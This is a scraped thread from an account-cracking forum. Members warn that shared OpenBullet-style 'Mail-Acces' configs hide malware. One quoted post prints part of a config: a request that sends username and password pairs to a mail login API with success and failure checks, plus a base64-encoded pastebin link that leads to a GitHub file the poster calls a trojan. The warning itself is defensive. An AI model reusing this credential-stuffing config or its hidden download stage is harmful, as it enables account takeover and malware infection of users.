Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 743

Beware of Malware configs

by ANG - 16 April, 2021 - 10:12 PM
This post is by a banned member (ANG) - Unhide
This post is by a banned member (clxdy) - Unhide
clxdy  
Registered
376
Posts
47
Threads
4 Years of service
#2
You look like you have no idea what you're talking about lmao Wine
This post is by a banned member (ANG) - Unhide
This post is by a banned member (H780000) - Unhide
H780000  
Infinity
456
Posts
125
Threads
4 Years of service
#4
Same risks with OB 2 configs which hide the stacker and compile to c# so others can't see (Especially if they are inexperienced in coding). Though it has some good sides but can be very malicious if used wrong. Should always check the code for the configs before running them blindly.
Discord - 0yxorp
Telegram - H780000
Server
This post is by a banned member (clxdy) - Unhide
clxdy  
Registered
376
Posts
47
Threads
4 Years of service
#5
(16 April, 2021 - 10:21 PM)ANG Wrote: Show More
(16 April, 2021 - 10:20 PM)Cyprus Wrote: Show More
You look like you have no idea what you're talking about lmao Wine

ye just BSing my way through this config and I have 0 idea that's why I wrote 0 idea instead of all that  DancingClown

(16 April, 2021 - 10:20 PM)Cyprus Wrote: Show More
You look like you have no idea what you're talking about lmao Wine

but if you do be my guest and make a better thread and ill remove this one  DancingClown
PepeGlad cap
This post is by a banned member (Sentonta) - Unhide
Sentonta  
Supreme
1.914
Posts
726
Threads
3 Years of service
#6
(16 April, 2021 - 10:12 PM)ANG Wrote: Show More
let me explain for the smoll brainers who want to learn:
config were talking about is called Mail-Acces 10K cpm
so let me explain:
[SCRIPT]
JUMP #PASSAPI
#PASSAPl

REQUEST GET "https://aj-https.my.com/cgi-bin/auth?model=&simple=1&Login=<USER>&Password=<PASS>"
  HEADER "User-Agent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0" 
KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Ok=0" 
  KEYCHAIN Success OR 
    KEY "Ok=1" 

so it starts with making a GET request to a random api I haven't figured it out
might actually be a login api idk doesn't matter
then it will 
FUNCTION Base64Decode "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhbjFNOUdM" -> VAR "urli" 
BASE64 decode that random string 
decoding that string reveals:
https://pastebin.com/raw/Ean-----
this URL in that pastebin there is a 
Github link:

https://raw.githubusercontent.com/-----------/earth.mp4
it downloads a .MP4 file. this file is according to VT is 
infect infected with a trojan so ye I fucked it with VT
but beware of these configs ty I hope I did a decent job of explenation
they hard code the config as BASE64 so you can't really
see what's happening if you come across this config
just upload it to VT it will fuck it up most likely Heart



old news bro https://cracked.to/Thread-Staff-Beware-o...gs--353126
[Image: 20230507-204708.jpg]

I do not randomly add people offsite, always confirm you are speaking with any other sentonta account by sending me a private message onsite
My ONLY active forum account is here on cracked.io all other sentonta names are fakes.

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)